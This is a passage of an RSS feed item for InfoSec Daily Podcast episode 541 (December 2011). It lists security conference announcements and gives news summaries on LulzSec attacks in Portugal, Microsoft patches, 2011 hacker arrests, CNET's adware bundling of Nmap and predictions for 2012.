<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/security/attacks-breaches/232300133/resurgent-lulzsec-attacks-government-sites-in-portugal.html"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/232300133/resurgent-lulzsec-attacks-government-sites-in-portugal.html</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacktivist group LulzSec was back in action last week, launching distributed denial-of-service (DDoS) attacks on government websites in Portugal.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group says it was driven to the attacks by Portuguese austerity measures, social inequalities, and recent police violence against demonstrators during a protest on Nov. 24, according to </span><a href="http://www.examiner.com/anonymous-in-national/lulzsec-anonymous-hacktivists-strike-portugal-after-police-brutality"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">news reports</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Friday, LulzSec Portugal launched a DDoS attack against the website of Banco de Portugal (Bank of Portugal), making the site inaccessible, according to the reports. In addition to taking down the Bank of Portugal website, LulzSec Portugal has been credited with successful attacks on numerous state services. Earlier this week, LulzSec disabled the websites of the Portugal House of Parliament, several political parties, and the national police.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last Sunday, LulzSec Portugal released the name, rank, identification number, contact information, and employment history for more than 100 national police officers believed to have taken part in the police. &quot;2011 is the year of revolutions and the biggest hacks in history (until now ..),&quot; the group said in an online statement. &quot;We are creating a way for the revolution global.&quot;</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9222530/Update_Microsoft_plans_20_patches_next_week_will_fix_Duqu_and_BEAST_bugs"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9222530/Update_Microsoft_plans_20_patches_next_week_will_fix_Duqu_and_BEAST_bugs</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft today announced it will issue 14 security bulletins next week to patch 20 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Among the patches will be ones that plug the hole used by the Duqu intelligence-gathering Trojan, and fix the SSL (secure socket layer) 3.0 and TLS (transport layer security) 1.0 bug popularized three months ago by the BEAST, for &quot;Browser Exploit Against SSL/TLS,&quot; hacking tool.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They&#39;re all over the map,&quot; said Andrew Storms, director of security operations at nCircle Security, describing the wide range of Microsoft products slated for patching. &quot;It looks like a big cleanup, where they&#39;re trying to get as much as they can off their plate before the end of the year.&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Three of the 14 updates were tagged with Microsoft&#39;s &quot;critical&quot; label, the highest threat ranking in its four-step system, while the remaining 11 were marked &quot;important,&quot; the second-highest rating.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bugs in 10 of the updates could be exploited by attackers to remotely plant attack code on unpatched PCs, Microsoft said in its monthly advance notification that precedes each Patch Tuesday. A number of those bulletins were pegged as important, a move Microsoft makes when the bugs cannot easily be exploited because the pertinent components are not switched on by default or because defensive technologies like ASLR and DEP help protect users.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/security/attacks-breaches/232300124/the-most-notorious-cybercrooks-of-2011-and-how-they-got-caught.html"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/232300124/the-most-notorious-cybercrooks-of-2011-and-how-they-got-caught.html</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While there are plenty of elusive hackers that will forever manage to outrun the law, the good guys scored some impressive arrests, indictments, and convictions in 2011. Here are some of the highest profile cases to hit the headlines this year.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. Anonymous and LulzSec Hacker: Ryan Cleary</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Ivy League Academic Content Turbo Downloader: Aaron Swartz</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. DNSchanger Creators: Vladimir Tsastsin, Timur Gerassimenko, Dmitri Jegorov, Valeri Aleksejev, Konstantin Poltev and Anton Ivanvov</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Sony Hacker: Cody Kretsinger</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Anonymous&#39; Inside Man at AT&amp;T: Lance Moore</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6. Apple iPad Snoop: Andrew Auernheimer</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7. Celebrity Hackerazzi: Christopher Chaney</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">8. Gucci Hacker: Sam Chihlung Yin </span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theaustralian.com.au/australian-it/it-jobs/public-sector-it-to-keep-hiring/story-fna12gpc-1226217777373"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theaustralian.com.au/australian-it/it-jobs/public-sector-it-to-keep-hiring/story-fna12gpc-1226217777373</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Australian government is expected to be among the strongest sectors for hiring IT skills next year, according to recruiters.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hiring experts say project managers and business analysts will be sought to lead new projects and focus on process improvement and cost efficiency across state and federal government.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IPads were being implemented as a new tool to aid public sector staff and was fuelling demand for the appropriate skills, Hays IT regional director Peter Noblet said.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Senior infrastructure project managers will also be needed as the Victorian government continues to centralise IT services,&rsquo;&rsquo; he said.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Client engagement and account managers were also wanted to build strong partnerships between government departments and CenITex, the Victorian shared services agency.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mr Noblet said business intelligence developers, in particular Microsoft and Oracle platforms, were also in demand in the public sector.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;(They are) needed due to the recognised need for BI to assist in management decision-making in addition to the large BI programs that are active across government.&rsquo;&rsquo;</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="https://threatpost.com/en_us/blogs/cnet-apologizes-nmap-adware-bundling-120811"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/cnet-apologizes-nmap-adware-bundling-120811</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials at Cnet&#39;s Download.com site have issued a statement apologizing for bundling the popular open source Nmap security audit application with adware that changed users&#39; search engine and home page to Microsoft properties. Fyodor, the author of Nmap, raised the issue earlier this week, saying that his app was being wrapped in malware on Download.com.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s not unusual for download sites to bundle free applications with some kind of adware or toolbar, but the creators of open-source applications take a dim view of this practice, given the nature and ethic of open source projects. Nmap is a venerable and widely used tool for mapping networks and performing security audits and Fyodor wrote in a </span><a href="http://seclists.org/nmap-hackers/2011/5"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">message to an Nmap mailing list</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> earlier this week that Download.com, which is part of Cnet, a subsidiary of CBS Interactive, was bundling the application with its installer, which, if a user agreed, would install a search toolbar and change the user&#39;s search engine to Bing.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The way it works is that C|Net&#39;s download page (screenshot attached) offers what they claim to be Nmap&#39;s Windows installer. They even provide the correct file size for our official installer. But users actually get a Cnet-created trojan installer. That program does the dirty work before downloading and executing Nmap&#39;s real installer. Of course the problem is that users often just click through installer screens, trusting that download.com gave them the real installer and knowing that the Nmap project wouldn&#39;t put malicious code in our installer. Then the next time the user opens their browser, they find that their computer is hosed with crappy toolbars, Bing searches, Microsoft as their home page, and whatever other shenanigans the software performs! The worst thing is that users will think we (Nmap Project) did this to them!&quot; Fyodor wrote in his original message.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.cioupdate.com/technology-trends/fortinets-top-8-security-predictions-for-2012.html"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cioupdate.com/technology-trends/fortinets-top-8-security-predictions-for-2012.html</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Looking back on 2011, </span><a href="http://www.fortiguard.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">FortiGuard Labs</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the research arm of </span><a href="http://www.fortinet.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Fortinet</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the &nbsp;saw a number of landmark developments in the world of network security. Huge botnets such as DNS Changer and Coreflood were permanently taken off line, 64-bit rootkits advanced (TDSS), source code was leaked for the Zeus and SpyEye botnets , and Anonymous hacktivists raised their profile by taking down major banks offline and threatening to go after a critical infrastructure and even drug cartels in Mexico.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many of these events our team predicted in their &ldquo;Top 5 Security Predictions for 2011,&rdquo; while others, such as legislation to potentially jail and fine individuals who had malicious code stored on computer systems were more surprising. </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2012 promises to be even more worrisome. After gazing into FortiCrystalball this month, FortiGuard Labs saw eight network security trends that could happen in the coming year. &nbsp;In short, the Labs are predicting a rise of mobile malware (with new worms and polymorphism), increased crackdowns on network run money laundering operations, &nbsp;renewed and successful collaboration between government and the private sectors, discoveries of exploitable SCADA vulnerabilities, an increase in sponsored attacks, and Anonymous hacktivists using their powers for good over evil. &nbsp;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 1: Ransomware will take mobile devices hostage </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 2: Worming into Android </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 3: Polymorphism want a cracker?</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 4: Clampdown on network-based money laundering </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 5: Public-Private Relationships in security </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-541-lulzsec-is-back-ms-14-patches-aussie%e2%80%99s-hiring-top-2011-hacks-cnet-apology-predictions/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3249/0/infosec-daily-podcast-episode-541.mp3" length="19890195" type="audio/mpeg" />
		<itunes:duration>0:41:23</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 541 for December 8, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 541 for December 8, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.darkreading.com/security/attacks-breaches/232300133/resurgent-lulzsec-attacks-government-sites-in-portugal.html

	The hacktivist group LulzSec was back in action last week, launching distributed denial-of-service (DDoS) attacks on government websites in Portugal.
	The group says it was driven to the attacks by Portuguese austerity measures, social inequalities, and recent police violence against demonstrators during a protest on Nov. 24, according to news reports.
	On Friday, LulzSec Portugal launched a DDoS attack against the website of Banco de Portugal (Bank of Portugal), making the site inaccessible, according to the reports. In addition to taking down the Bank of Portugal website, LulzSec Portugal has been credited with successful attacks on numerous state services. Earlier this week, LulzSec disabled the websites of the Portugal House of Parliament, several political parties, and the national police.
	Last Sunday, LulzSec Portugal released the name, rank, identification number, contact information, and employment history for more than 100 national police officers believed to have taken part in the police. &#34;2011 is the year of revolutions and the biggest hacks in history (until now ..),&#34; the group said in an online statement. &#34;We are creating a way for the revolution global.&#34;
	&#160;
Source: &#160;http://www.computerworld.com/s/article/9222530/Update_Microsoft_plans_20_patches_next_week_will_fix_Duqu_and_BEAST_bugs

	Microsoft today announced it will issue 14 security bulletins next week to patch 20 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player.
	Among the patches will be ones that plug the hole used by the Duqu intelligence-gathering Trojan, and fix the SSL (secure socket layer) 3.0 and TLS (transport layer security) 1.0 bug popularized three months ago by the BEAST, for &#34;Browser Exploit Against SSL/TLS,&#34; hacking tool[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 540 &#8211; Ultimate Bet, Lucky Supermarket, Cuckold Hacking, Lockheed-Martin Targeted &amp; Insider Psychology</title>
